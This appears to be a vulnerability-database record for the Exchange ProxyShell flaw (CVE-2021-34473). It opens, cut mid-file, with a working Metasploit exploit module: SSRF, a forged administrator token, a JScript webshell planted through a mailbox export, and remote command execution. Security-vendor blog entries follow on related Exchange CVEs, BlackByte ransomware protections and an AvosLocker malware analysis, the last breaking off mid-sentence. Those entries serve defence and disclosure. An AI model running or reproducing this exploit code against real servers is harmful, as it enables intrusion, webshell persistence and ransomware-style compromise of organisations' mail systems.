\\'Server ID\\' was found') if server.nil? || server.empty?\n\n { server: server, legacy_dn: legacy_dn }\n end\n\n def request_fqdn\n ntlm_ssp = \"NTLMSSP\\x00\\x01\\x00\\x00\\x00\\x05\\x02\\x88\\xa0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n received = send_request_raw(\n 'method' => 'RPC_IN_DATA',\n 'uri' => normalize_uri('rpc', 'rpcproxy.dll'),\n 'headers' => {\n 'Authorization' => \"NTLM #{Rex::Text.encode_base64(ntlm_ssp)}\"\n }\n )\n fail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received\n\n if received.code == 401 && received['WWW-Authenticate'] && received['WWW-Authenticate'].match(/^NTLM/i)\n hash = received['WWW-Authenticate'].split('NTLM ')[1]\n message = Net::NTLM::Message.parse(Rex::Text.decode_base64(hash))\n dns_server = Net::NTLM::TargetInfo.new(message.target_info).av_pairs[Net::NTLM::TargetInfo::MSV_AV_DNS_COMPUTER_NAME]\n\n return dns_server.force_encoding('UTF-16LE').encode('UTF-8').downcase\n end\n\n fail_with(Failure::NotFound, 'No Backend server was found')\n end\n\n # https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-oxcmapihttp/c245390b-b115-46f8-bc71-03dce4a34bff\n def request_mapi(legacy_dn)\n data = \"#{legacy_dn}\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\"\n headers = {\n 'X-RequestType' => 'Connect',\n 'X-ClientInfo' => random_mapi_id,\n 'X-ClientApplication' => datastore['MapiClientApp'],\n 'X-RequestId' => \"#{random_mapi_id}:#{Rex::Text.rand_text_numeric(5)}\"\n }\n\n sid = ''\n response = send_http(\n 'POST',\n '/mapi/emsmdb',\n data: data,\n ctype: 'application/mapi-http',\n headers: headers\n )\n if response&.code == 200\n sid = response.body.match(/S-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*/).to_s\n end\n fail_with(Failure::NotFound, 'No \\'SID\\' was found') if sid.empty?\n\n sid\n end\n\n def get_sid_for_email(email)\n autodiscover = request_autodiscover(email)\n request_mapi(autodiscover[:legacy_dn])\n end\n\n # pre-authentication SSRF (Server Side Request Forgery) + impersonate as admin.\n def exploit_setup\n if datastore['BackendServerName'] && !datastore['BackendServerName'].empty?\n server_name = datastore['BackendServerName']\n print_status(\"Internal server name forced to: #{server_name}\")\n else\n print_status('Retrieving backend FQDN over RPC request')\n server_name = request_fqdn\n print_status(\"Internal server name: #{server_name}\")\n end\n @backend_server_name = server_name\n\n get_common_access_token\n print_good('Successfully assigned the \\'Mailbox Import Export\\' role')\n print_good(\"Proceeding with SID: #{@mailbox_user_sid} (#{@mailbox_user_email})\")\n end\n\n def probe_powershell_backend(common_access_token)\n powershell_probe = send_http('GET', \"/PowerShell/?X-Rps-CAT=#{common_access_token}\")\n fail_with(Failure::UnexpectedReply, 'Failed to access the PowerShell backend') unless powershell_probe&.code == 200\n end\n\n # this function doesn't return unless it's successful\n def get_common_access_token\n # get a SID from the specified email address\n email_address = datastore['EMAIL']\n unless email_address.blank?\n sid = get_sid_for_email(email_address)\n vprint_status(\"SID: #{sid} (#{email_address})\")\n common_access_token = build_token(sid)\n probe_powershell_backend(common_access_token)\n\n print_status(\"Assigning the 'Mailbox Import Export' role via #{email_address}\")\n role_assigned = execute_powershell('New-ManagementRoleAssignment', cat: common_access_token, args: [\n { name: '-Role', value: 'Mailbox Import Export' },\n { name: '-User', value: email_address }\n ])\n unless role_assigned\n fail_with(Failure::BadConfig, 'The specified email address does not have the \\'Mailbox Import Export\\' role and can not self-assign it')\n end\n\n @mailbox_user_sid = sid\n @mailbox_user_email = email_address\n @common_access_token = common_access_token\n return\n end\n\n print_status('Enumerating valid email addresses and searching for one that either has the \\'Mailbox Import Export\\' role or can self-assign it')\n get_emails.each do |this_email_address|\n next if this_email_address == email_address # already tried this one\n\n vprint_status(\"Reattempting to assign the 'Mailbox Import Export' role via #{this_email_address}\")\n begin\n this_sid = get_sid_for_email(this_email_address)\n rescue RuntimeError\n print_error(\"Failed to identify the SID for #{this_email_address}\")\n next\n end\n\n common_access_token = build_token(this_sid)\n role_assigned = execute_powershell('New-ManagementRoleAssignment', cat: common_access_token, args: [\n { name: '-Role', value: 'Mailbox Import Export' },\n { name: '-User', value: this_email_address }\n ])\n next unless role_assigned\n\n @mailbox_user_sid = this_sid\n @mailbox_user_email = this_email_address\n @common_access_token = common_access_token\n return # rubocop:disable Lint/NonLocalExitFromIterator\n end\n\n fail_with(Failure::NoAccess, 'No user with the necessary management role was identified')\n end\n\n def send_http(method, uri, opts = {})\n ssrf = \"Autodiscover/autodiscover.json?a=#{@ssrf_email}\"\n opts[:cookie] = \"Email=#{ssrf}\"\n super(method, \"/#{ssrf}#{uri}\", opts)\n end\n\n def get_emails\n mailbox_table = Rex::Text::Table.new(\n 'Header' => 'Exchange Mailboxes',\n 'Columns' => %w[EmailAddress Name RoutingType MailboxType]\n )\n\n MailboxEnumerator.new(self).each do |row|\n mailbox_table << row\n end\n\n print_status(\"Enumerated #{mailbox_table.rows.length} email addresses\")\n stored_path = store_loot('ad.exchange.mailboxes', 'text/csv', rhost, mailbox_table.to_csv)\n print_status(\"Saved mailbox and email address data to: #{stored_path}\")\n\n mailbox_table.rows.map(&:first)\n end\n\n def create_embedded_draft(user_sid)\n @shell_input_name = rand_text_alphanumeric(8..12)\n @draft_subject = rand_text_alphanumeric(8..12)\n print_status(\"Saving a draft email with subject '#{@draft_subject}' containing the attachment with the embedded webshell\")\n payload = Rex::Text.encode_base64(PstEncoding.encode(\"#<script language=\\\"JScript\\\" runat=\\\"server\\\">function Page_Load(){eval(Request[\\\"#{@shell_input_name}\\\"],\\\"unsafe\\\");}</script>\"))\n file_name = \"#{Faker::Lorem.word}#{%w[- _].sample}#{Faker::Lorem.word}.#{%w[rtf pdf docx xlsx pptx zip].sample}\"\n envelope = XMLTemplate.render('soap_draft', user_sid: user_sid, file_content: payload, file_name: file_name, subject: @draft_subject)\n\n send_http('POST', '/ews/exchange.asmx', data: envelope, ctype: 'text/xml;charset=UTF-8')\n end\n\n def web_directory\n if datastore['UseAlternatePath']\n datastore['IISWritePath'].gsub('\\\\', '/')\n else\n datastore['ExchangeWritePath'].gsub('\\\\', '/')\n end\n end\n\n def build_token(sid)\n uint8_tlv = proc do |type, value|\n type + [value.length].pack('C') + value\n end\n\n token = uint8_tlv.call('V', \"\\x00\")\n token << uint8_tlv.call('T', 'Windows')\n token << \"\\x43\\x00\"\n token << uint8_tlv.call('A', 'Kerberos')\n token << uint8_tlv.call('L', 'Administrator')\n token << uint8_tlv.call('U', sid)\n\n # group data for S-1-5-32-544\n token << \"\\x47\\x01\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x0c\\x53\\x2d\\x31\\x2d\\x35\\x2d\\x33\\x32\\x2d\\x35\\x34\\x34\\x45\\x00\\x00\\x00\\x00\"\n Rex::Text.encode_base64(token)\n end\n\n def exploit\n @ssrf_email ||= Faker::Internet.email\n print_status('Attempt to exploit for CVE-2021-34473')\n exploit_setup\n\n create_embedded_draft(@mailbox_user_sid)\n @shell_filename = \"#{rand_text_alphanumeric(8..12)}.aspx\"\n if datastore['UseAlternatePath']\n unc_path = \"#{datastore['IISBasePath'].split(':')[1]}\\\\#{datastore['IISWritePath']}\"\n unc_path = \"\\\\\\\\\\\\\\\\#{@backend_server_name}\\\\#{datastore['IISBasePath'].split(':')[0]}$#{unc_path}\\\\#{@shell_filename}\"\n else\n unc_path = \"#{datastore['ExchangeBasePath'].split(':')[1]}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\"\n unc_path = \"\\\\\\\\\\\\\\\\#{@backend_server_name}\\\\#{datastore['ExchangeBasePath'].split(':')[0]}$#{unc_path}\\\\#{@shell_filename}\"\n end\n\n normal_path = unc_path.gsub(/^\\\\+[\\w.-]+\\\\(.)\\$\\\\/, '\\1:\\\\')\n print_status(\"Writing to: #{normal_path}\")\n register_file_for_cleanup(normal_path)\n\n @export_name = rand_text_alphanumeric(8..12)\n successful = execute_powershell('New-MailboxExportRequest', cat: @common_access_token, args: [\n { name: '-Name', value: @export_name },\n { name: '-Mailbox', value: @mailbox_user_email },\n { name: '-IncludeFolders', value: '#Drafts#' },\n { name: '-ContentFilter', value: \"(Subject -eq '#{@draft_subject}')\" },\n { name: '-ExcludeDumpster' },\n { name: '-FilePath', value: unc_path }\n ])\n fail_with(Failure::UnexpectedReply, 'The mailbox export request failed') unless successful\n\n exported = false\n print_status('Waiting for the export request to complete...')\n 30.times do\n sleep 5\n next unless send_request_cgi('uri' => normalize_uri(web_directory, @shell_filename))&.code == 200\n\n print_good('The mailbox export request has completed')\n exported = true\n break\n end\n\n fail_with(Failure::Unknown, 'The mailbox export request timed out') unless exported\n\n print_status('Triggering the payload')\n case target['Type']\n when :windows_command\n vprint_status(\"Generated payload: #{payload.encoded}\")\n\n if !cmd_windows_generic?\n execute_command(payload.encoded)\n else\n boundary = rand_text_alphanumeric(8..12)\n response = execute_command(\"cmd /c echo START#{boundary}&#{payload.encoded}&echo END#{boundary}\")\n\n print_warning('Dumping command output in response')\n if response.body =~ /START#{boundary}(.*)END#{boundary}/m\n print_line(Regexp.last_match(1).strip)\n else\n print_error('Empty response, no command output')\n end\n end\n when :windows_dropper\n execute_command(generate_cmdstager(concat_operator: ';').join)\n when :windows_powershell\n cmd = cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true)\n execute_command(cmd)\n end\n end\n\n def cleanup\n super\n return unless @common_access_token && @export_name\n\n print_status('Removing the mailbox export request')\n execute_powershell('Remove-MailboxExportRequest', cat: @common_access_token, args: [\n { name: '-Identity', value: \"#{@mailbox_user_email}\\\\#{@export_name}\" },\n { name: '-Confirm', value: false }\n ])\n\n print_status('Removing the draft email')\n execute_powershell('Search-Mailbox', cat: @common_access_token, args: [\n { name: '-Identity', value: @mailbox_user_email },\n { name: '-SearchQuery', value: \"Subject:\\\"#{@draft_subject}\\\"\" },\n { name: '-Force' },\n { name: '-DeleteContent' }\n ])\n end\n\n def execute_command(cmd, _opts = {})\n if !cmd_windows_generic?\n cmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\"));\"\n else\n cmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\").StdOut.ReadAll());\"\n end\n\n send_request_raw(\n 'method' => 'POST',\n 'uri' => normalize_uri(web_directory, @shell_filename),\n 'ctype' => 'application/x-www-form-urlencoded',\n 'data' => \"#{@shell_input_name}=#{cmd}\"\n )\n end\nend\n\n# Use https://learn.microsoft.com/en-us/exchange/client-developer/web-service-reference/resolvenames to resolve mailbox\n# information. The endpoint only returns 100 at a time though so if the target has more than that many email addresses\n# multiple requests will need to be made. Since the endpoint doesn't support pagination, we refine the query by using\n# progressively larger search prefixes until there are less than 101 results and thus will fit into a single response.\nclass MailboxEnumerator\n def initialize(mod)\n @mod = mod\n end\n\n # the characters that Exchange Server 2019 allows in an alias (no unicode)\n ALIAS_CHARSET = 'abcdefghijklmnopqrstuvwxyz0123456789!#$%&\\'*+-/=?^_`{|}~'.freeze\n XML_NS = {\n 'm' => 'http://schemas.microsoft.com/exchange/services/2006/messages',\n 't' => 'http://schemas.microsoft.com/exchange/services/2006/types'\n }.freeze\n\n include Enumerable\n XMLTemplate = Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell::XMLTemplate\n\n def each(name: 'SMTP:', &block)\n envelope = XMLTemplate.render('soap_getemails', name: name)\n res = @mod.send_http('POST', '/ews/exchange.asmx', data: envelope, ctype: 'text/xml;charset=UTF-8')\n return unless res&.code == 200\n\n if res.get_xml_document.xpath('//m:ResolutionSet/@IncludesLastItemInRange', XML_NS).first&.text&.downcase == 'false'\n ALIAS_CHARSET.each_char do |char|\n each(name: name + char, &block)\n end\n else\n res.get_xml_document.xpath('//t:Mailbox', XML_NS).each do |mailbox|\n yield %w[t:EmailAddress t:Name t:RoutingType t:MailboxType].map { |xpath| mailbox.xpath(xpath, XML_NS)&.text || '' }\n end\n end\n end\nend\n\nclass PstEncoding\n ENCODE_TABLE = [\n 71, 241, 180, 230, 11, 106, 114, 72,\n 133, 78, 158, 235, 226, 248, 148, 83,\n 224, 187, 160, 2, 232, 90, 9, 171,\n 219, 227, 186, 198, 124, 195, 16, 221,\n 57, 5, 150, 48, 245, 55, 96, 130,\n 140, 201, 19, 74, 107, 29, 243, 251,\n 143, 38, 151, 202, 145, 23, 1, 196,\n 50, 45, 110, 49, 149, 255, 217, 35,\n 209, 0, 94, 121, 220, 68, 59, 26,\n 40, 197, 97, 87, 32, 144, 61, 131,\n 185, 67, 190, 103, 210, 70, 66, 118,\n 192, 109, 91, 126, 178, 15, 22, 41,\n 60, 169, 3, 84, 13, 218, 93, 223,\n 246, 183, 199, 98, 205, 141, 6, 211,\n 105, 92, 134, 214, 20, 247, 165, 102,\n 117, 172, 177, 233, 69, 33, 112, 12,\n 135, 159, 116, 164, 34, 76, 111, 191,\n 31, 86, 170, 46, 179, 120, 51, 80,\n 176, 163, 146, 188, 207, 25, 28, 167,\n 99, 203, 30, 77, 62, 75, 27, 155,\n 79, 231, 240, 238, 173, 58, 181, 89,\n 4, 234, 64, 85, 37, 81, 229, 122,\n 137, 56, 104, 82, 123, 252, 39, 174,\n 215, 189, 250, 7, 244, 204, 142, 95,\n 239, 53, 156, 132, 43, 21, 213, 119,\n 52, 73, 182, 18, 10, 127, 113, 136,\n 253, 157, 24, 65, 125, 147, 216, 88,\n 44, 206, 254, 36, 175, 222, 184, 54,\n 200, 161, 128, 166, 153, 152, 168, 47,\n 14, 129, 101, 115, 228, 194, 162, 138,\n 212, 225, 17, 208, 8, 139, 42, 242,\n 237, 154, 100, 63, 193, 108, 249, 236\n ].freeze\n\n def self.encode(data)\n encoded = ''\n data.each_char do |char|\n encoded << ENCODE_TABLE[char.ord].chr\n end\n encoded\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/exchange_proxyshell_rce.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2022-10-13T02:05:20", "description": "On September 29, Microsoft security researchers announced two new zero-day vulnerabilities, CVE-2022-41040 and CVE-2022-41082 affecting Microsoft Exchange Server. The vulnerabilities allow remote code execution (RCE) when used in tandem. It is important to note that both require authenticated access to the desired server before exploitation. Trend Micro gave the two vulnerabilities severity ratings of 8.8 and 6.3 out of 10, respectively.\n\nAccording to researchers, CVE-2022-41082 is closely related to the [ProxyShell](<https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9>) vulnerability from 2021, CVE-2021-34473. The request string disclosed from the recent exploit is identical to that of last year\u2019s vulnerability, and the mitigation provided by Microsoft is the same as well.\n\nImperva Threat Research has observed considerable related attacker activity targeting last year\u2019s ProxyShell vulnerability (CVE-2021-34473) recently. Threat Research rules and policies may also be picking up attacks targeting the new exploits (CVE-2022-41040 and CVE-2022-41082).\n\n[GTSC](<https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>), the company who discovered these vulnerabilities in August, believes that a Chinese threat actor may be behind the attacks observed so far. Per GTSC, the attacks include a Chinese character encoding and the China Chopper webshell for persistent remote access, which is a backdoor commonly used by likely state-sponsored Chinese hacking groups.\n\nGiven existing blocking rules that mitigate the CVE-2021-34473 proxyshell vulnerabilities, these new CVEs are mitigated out of the box by both Imperva Cloud WAF and WAF Gateway. If customers wish to implement a manual mitigation based on the advisory from Microsoft, it can be found [here](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>). Microsoft noted that the CVEs only impact on-premise Exchange servers, so Exchange Online Customers do not currently need to take any action.\n\nAs always, Imperva\u200b\u200b Threat Research continues to monitor the situation and will provide updates as new information emerges.\n\nThe post [Microsoft Exchange Server Vulnerabilities CVE-2022-41040 and CVE-2022-41082](<https://www.imperva.com/blog/microsoft-exchange-server-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T16:47:34", "type": "impervablog", "title": "Microsoft Exchange Server Vulnerabilities CVE-2022-41040 and CVE-2022-41082", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473", "CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T16:47:34", "id": "IMPERVABLOG:2303181B17E64D6C752ACD64C5A2B39C", "href": "https://www.imperva.com/blog/microsoft-exchange-server-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "trellix": [{"lastseen": "2022-02-28T00:00:00", "description": "![trellix intelligence](https://www.trellix.com/en-us/img/newsroom/stories/trellix-intelligence.jpeg)\n\n# Trellix Global Defenders: Analysis and Protections for BlackByte Ransomware\n\nBy Taylor Mullins \u00b7 February 28, 2022\n\nBlackByte Ransomware has been in the news of late due to a successful attack against a National Football League (NFL) Franchise and a Joint Cybersecurity Advisory by the Federal Bureau of Investigation (FBI) and the U.S. Secret Service (USSS) warning on breaches to the networks of at least three organizations from US critical infrastructure sectors in the last three months. BlackByte Ransomware is currently being offered to threat actors as a Ransomware-as-a-Service (RaaS) and makes use of PowerShell and Windows CLI commands to carry out various tasks such as network discovery, task scheduling and to create and disable Windows and security services.\n\nBlackByte Ransomware makes files inaccessible by encrypting them and generates a ransom note (the \"BlackByte_restoremyfiles.hta\" file) that contains instructions on how to contact the attackers for data decryption and other details. Also, BlackByte appends the \".blackbyte\" extension to the names of encrypted files. BlackByte does have worming capabilities and can infect additional endpoints on the same network.\n\n![Figure 1. MITRE ATT&CK Framework for BlackByte Ransomware](https://www.trellix.com/en-us/img/newsroom/stories/analysis-protections-blackbyte-ransomware1.jpg) **Figure 1. MITRE ATT&CK Framework for BlackByte Ransomware**\n\n## Recommended Steps to Prevent Initial Access \n\nThe Joint Cybersecurity Advisory provides several recommendations to secure your environment against BlackByte that were gathered from their analysis of malware samples discovered in the wild.\n\n * BlackByte operators have been observed exploiting the following CVEs to gain initial access, patching is recommended to prevent exploitation.\n * [CVE-2021-34473](<https://vulners.com/cve/CVE-2021-34473>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability\n * [CVE-2021-34523](<https://vulners.com/cve/CVE-2021-34523>) \\- Microsoft Exchange Server Elevation of Privilege Vulnerability\n * [CVE-2021-31207](<https://vulners.com/cve/CVE-2021-31207>) \\- Microsoft Exchange Server Security Feature Bypass Vulnerability\n * Blocking IP Addresses known to download additional payloads in BlackByte attacks prior to encryption: **185.93.6.31** and **45.9.148.114.**\n * Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs for any unusual activity.\n * After gaining access to the service accounts some adversaries have utilized AnyDesk for lateral movement, monitoring for AnyDesk activity can be an early indicator of compromise if AnyDesk is not utilized or allowed by your organization.\n * Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.\n * Disable hyperlinks in received emails.\n\n[Joint Cybersecurity Advisory: Indicators of Compromise Associated with BlackByte Ransomware](<https://www.ic3.gov/Media/News/2022/220211.pdf>)\n\n## Trellix Protections and Global Detections\n\nTrellix Global Threat Intelligence is currently detecting all known analyzed indicators for this campaign.\n\n![Figure 2. Trellix Products detecting this threat globally. Source: MVISION Insights](https://www.trellix.com/en-us/img/newsroom/stories/analysis-protections-blackbyte-ransomware2.jpg) **Figure 2. Trellix Products detecting this threat globally. Source: MVISION Insights**\n\n## Blocking BlackByte Attacks with Endpoint Security\n\nTrellix ENS is currently detecting BlackByte Indicators of Compromise (IOCs) from the standpoint of signature detections and the malware behavior associated with BlackByte Ransomware attacks. The following Exploit Prevention Rule in ENS has shown success in stopping BlackByte samples due to BlackByte being Script-based. Trellix always recommends testing in Report Only Mode before blocking to confirm no false positives are being detected by this signature rule.\n\n### Exploit Prevention Signature ID 6207: ASR : File Download attempt by Scripts\n\n![Figure 3. Exploit Prevention Rule in ePolicy Orchestrator/MVISION ePO](https://www.trellix.com/en-us/img/newsroom/stories/analysis-protections-blackbyte-ransomware3.jpg) **Figure 3. Exploit Prevention Rule in ePolicy Orchestrator/MVISION ePO** ![Figure 4. MVISION EDR noting where Endpoint Protection \$ENS\$ could have stopped specific techniques](https://www.trellix.com/en-us/img/newsroom/stories/analysis-protections-blackbyte-ransomware4.jpg) **Figure 4. MVISION EDR noting where Endpoint Protection (ENS) could have stopped specific techniques** ![Figure 5. Ransomware Detection Name and Observed Detections noted in MVISION Insights](https://www.trellix.com/en-us/img/newsroom/stories/analysis-protections-blackbyte-ransomware5.jpg) **Figure 5. Ransomware Detection Name and Observed Detections noted in MVISION Insights**\n\n## BlackByte Threat Intelligence from the Trellix Advanced Threat Research Team and MVISION Insights\n\nMVISION Insights will provide the current threat intelligence and known indicators for BlackByte Ransomware. MVISION Insights will alert to detections and Process Traces that have been observed and systems that require additional attention to prevent widespread infection. MVISION Insights will also include Hunting Rules for threat hunting and further intelligence gathering of the threat activity and adversary.\n\n### MVISION Insights Campaign Names: Cybersecurity Advisory - BlackByte Ransomware and JavaScript Malware Threat Landscape\n\n![Figure 6. Campaign Details, Analyzed Indicators of Compromise, and Detections](https://www.trellix.com/en-us/img/newsroom/stories/analysis-protections-blackbyte-ransomware6.jpg) **Figure 6. Campaign Details, Analyzed Indicators of Compromise, and Detections** ![Figure 7. Hunting Rules for BlackByte Ransomware in MVISION Insights](https://www.trellix.com/en-us/img/newsroom/stories/analysis-protections-blackbyte-ransomware7.jpg) **Figure 7. Hunting Rules for BlackByte Ransomware in MVISION Insights**\n\n## Detecting Malicious Activity with MVISION EDR\n\nMVISION EDR is currently monitoring for the activity associated with BlackByte Ransomware and will note the MITRE techniques and any suspicious indicators related to the adversarial activity. Several of the techniques outlined in the Joint Advisory that are observed with BlackByte are noted below, monitoring for this type of activity can point to activity associated with the Tactics, techniques, and procedures (TTPs) for BlackByte.\n\n![Figure 8. Network Connection to Known Malicious IP Address Associated with BlackByte](https://www.trellix.com/en-us/img/newsroom/stories/analysis-protections-blackbyte-ransomware8.jpg) **Figure 8. Network Connection to Known Malicious IP Address Associated with BlackByte** ![Figure 9. Enabling of remote registry for possible preparation of Lateral Movement](https://www.trellix.com/en-us/img/newsroom/stories/analysis-protections-blackbyte-ransomware9.jpg) **Figure 9. Enabling of remote registry for possible preparation of Lateral Movement** ![Figure 10. Deletion of Shadow Copy to inhibit system recovery](https://www.trellix.com/en-us/img/newsroom/stories/analysis-protections-blackbyte-ransomware10.jpg) **Figure 10. Deletion of Shadow Copy to inhibit system recovery**\n\nTrellix offers Threat Intelligence Briefings along with Cloud Security and Data Protection workshops to provide customers with best practice recommendations on how to utilize their existing security controls to protect against adversarial and insider threats, please reach out if you would like to schedule a workshop with your organization.\n", "cvss3": {}, "published": "2022-02-28T00:00:00", "type": "trellix", "title": "Trellix Global Defenders: Analysis and Protections for BlackByte Ransomware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-02-28T00:00:00", "id": "TRELLIX:21227249912602DD6E11D3B19898A7FF", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/trellix-global-defenders-analysis-and-protections-for-blackbyte-ransomware.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "qualysblog": [{"lastseen": "2022-03-07T05:27:25", "description": "_AvosLocker is a ransomware group that was identified in 2021, specifically targeting Windows machines. Now a new variant of AvosLocker malware is also targeting Linux environments. In this blog, we examine the behavior of these two AvosLocker Ransomware in detail._\n\nAvosLocker is a relatively new ransomware-as-a-service that was first spotted in late June 2021. The attackers use spam email campaigns as initial infection vectors for the delivery of the ransomware payload. During the encryption, process files are appended with the ".avos" extension. An updated variant appends with the extension ".avos2". Similarly, the Linux version appends with the extension ".avoslinux".\n\nAfter every successful attack, the AvosLocker gang releases the names of their victims on the Dark Leak website hosted on the TOR network and provides exfiltrated data for sale. URL structure: `hxxp://avosxxx\u2026xxx[.]onion`\n\nThe AvosLocker gang also advertises their latest ransomware variants on the Dark Leak website. URL structure: `hxxp://avosjonxxx\u2026xxx[.]onion`\n\nThe gang has claimed, \u201cThe AvosLocker's latest Windows variant is one of the fastest in the market with highly scalable threading and selective ciphers.\u201d They offer an affiliate program that provides ransomware-as-a-service (RaaS) for potential partners in crime.\n\nRecently they have added support for encrypting Linux systems, specifically targeting VMware ESXi virtual machines. This allows the gang to target a wider range of organizations. It also possesses the ability to kill ESXi VMs, making it particularly nasty.\n\nAccording to [deepweb research](<https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/>) by Cyble Research Labs, the Threats Actors of AvosLocker ransomware groups are exploiting Microsoft Exchange Server vulnerabilities using Proxyshell, compromising the victim\u2019s network.\n\nCVEs involved in these exploits are CVE-2021-34473, CVE-2021-31206, CVE-2021-34523, and CVE-2021-31207.\n\n### Technical Analysis of AvosLocker Windows Variant\n\n#### Command-Line Options\n\nThe following figure shows a sample of Command-Line Options.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-1-Command-Line-Option.png)Fig. 1: Command Line Option\n\nThe available options allow for control over items like enabling/disabling SMB brute force, mutex creation, or control over the concurrent number of threads. \nIf no options are given, the malware runs with default options as shown in figure 2, where it ignores encryption of network drives and SMB share. It runs 200 threads concurrently of its file encryption routine.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-2-Execution-with-Default-Parameter.png)Fig. 2: Execution with Default Parameter\n\nWhile execution, the malware console displays detailed information about its progress on the screen (fig. 3).\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-3-Progress-Details.png)Fig. 3: Progress Details\n\nMost of the strings in the malware are kept in the XOR encrypted format. The decryption routines are similar, only registers and keys are different (fig. 4). Strings are decrypted just before their use.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-4-Commonly-Used-Decryption-Routine.png)Fig. 4: Commonly Used Decryption Routine\n\nInitially, the malware collects the command line options provided while launching the application (fig. 5).\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-5-Get-command-line-Options.png)Fig. 5: Get command-line Options\n\nThen it decrypts the mutex name \u201cCheic0WaZie6zeiy\u201d and checks whether it is already running or not to avoid multiple instances (fig. 6).\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-6-Mutex-Creation.png)Fig. 6: Mutex Creation\n\nAs shown in figure 7, AvosLocker uses multi-threaded tactics. It calls the below APIs to create multiple instances of worker threads into memory and share file paths among multiple threads. Smartly utilizing the computing power of multi-core CPUs.\n\nAPIs called:\n\n * CreateIoCompletionPort()\n * PostQueuedCompletionStatus()\n * GetQueuedCompletionPort()\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-7-Use-of-CreateIoCompletionPort.png)Fig. 7: Use of CreateIoCompletionPort\n\nThe code creates multiple threads in a loop (fig. 8). The threads are set to the highest priority for encrypting data quickly.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-8-Create-Thread-In-Loop-and-Set-Priority.png)Fig. 8: Create Thread In-Loop and Set Priority\n\nAvosLocker ransomware performs a recursive sweep through the file system (fig. 9), searches for attached drives, and enumerates network resources using API WNetOpenEnum() and WnetEnumResource().\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-9-Search-Network-Share.png)Fig. 9: Search Network Share\n\nBefore selecting the file for encryption, it checks for file attributes and skips it if \u201c**FILE_ATTRIBUTE_HIDDEN**\u201d or \u201c**FILE_ATTRIBUTE_SYSTEM**\u201d as shown in figure 10.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-10-Check-File-Attribute.png)Fig. 10: Check File Attribute\n\nOnce the file attribute check is passed, it performs the file extension check. It skips files from encryption if its extension gets matched with one of the extensions shown in figure 11.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-11-Skip-Extension-List.png)Fig. 11: Skip Extension List\n\nIt also contains the list of files and folders that need to be skipped from the encryption (fig. 12).\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-12-Skip-File-Folder-List.png)Fig. 12: Skip File Folder List\n\nAvosLocker uses RSA encryption, and it comes with a fixed hardcoded ID and RSA Public Key of the attacker (fig. 